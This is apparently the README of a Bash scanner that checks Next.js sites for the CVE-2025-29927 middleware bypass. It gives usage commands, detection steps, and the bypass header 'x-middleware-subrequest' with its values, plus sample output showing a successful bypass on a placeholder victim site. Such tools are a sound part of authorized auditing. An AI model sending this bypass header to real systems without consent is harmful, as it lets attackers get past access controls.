
CVE-2025-29927 Exploit-Checker
Automatisiertes Bash-Tool zur Erkennung von Next.js-Anwendungen, die anfällig für den Middleware-Bypass CVE-2025-29927 sind, basierend auf der Forschung von Zhero Web Security.
bashwhatwebcurlInstalliere sie unter Debian/Ubuntu mit:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
Erstelle eine Datei urls.txt mit einer URL pro Zeile:
https://target1.com
https://target2.com
Ausführen:
./nextjs_bypass_checker_v2.sh -l urls.txt
Identifikation von Next.js
whatweb, um die Technologie zu erkennen./_next/static/BUILD_ID und _buildManifest.js zu lesen.Middleware-Erkennung
X-Middleware-RewriteX-Middleware-Set-CookieBypass-Test
x-middleware-subrequest gesendet und die Header werden erkannt.[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
Dieses Skript dient zu Bildungszwecken und autorisierten Audits. Verwende es nicht gegen Ziele ohne Einwilligung. Missbrauch kann eine illegale Handlung darstellen.
Basiert auf der Forschung von: Zhero Web Security